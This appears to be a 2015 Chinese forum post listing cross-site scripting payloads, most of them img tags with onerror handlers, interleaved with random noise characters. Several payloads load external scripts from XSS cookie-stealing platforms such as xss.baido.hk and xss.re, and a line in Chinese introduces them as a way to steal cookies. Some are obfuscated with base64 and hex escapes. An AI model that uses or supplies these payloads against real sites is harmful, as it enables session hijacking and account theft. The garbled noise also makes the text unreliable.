<img src='non-exist.jpg'onerror="alert('xss')">/ c9 Q6 p# o; C4 X
<img src=# onerror=alert(123)>
3 p# v) F+ P$ y4 M. x+ @" w<img src=# onerror=alert(document.cookie)>5 b* ?0 [: z: i: C y' l3 ?, \" P
下面是利用平台钓cookie的
# z! M6 A$ Y/ W: G+ [ <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>9 g; |) X a3 B! L q' N: j
- q1 H! i6 _6 z# X
8 ~1 Z6 }4 `: H* K<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>' r* T P1 B* G* }* ?. J
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>' x& E( X; I5 c& }, \1 L9 l1 W
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>1 L+ J& W: [1 T2 V1 R4 b
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
7 c9 _0 O' b/ _5 Q: V<img src="#">
5 B. I' J/ k F+ J# O- k6 n/ c- `6 E- \<img src="#">2 j W% Q3 ?" E& n
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
N# V. A$ s3 }6 g& v# u<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
, Q% s; [, a" p3 v7 J<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))> @ [/ ~$ P7 u$ K) a
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
, r( t; ^3 a( d1 I7 E<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>1 A5 u+ m& D3 N: r4 W8 i
<img src=x width="0" height="0"></img>
4 a6 w E Z, \2 p<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>) v3 \3 }, x9 Q
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
1 m0 c8 A/ U4 q |
发表于 2015-10-18 14:33:54
收藏
支持
反对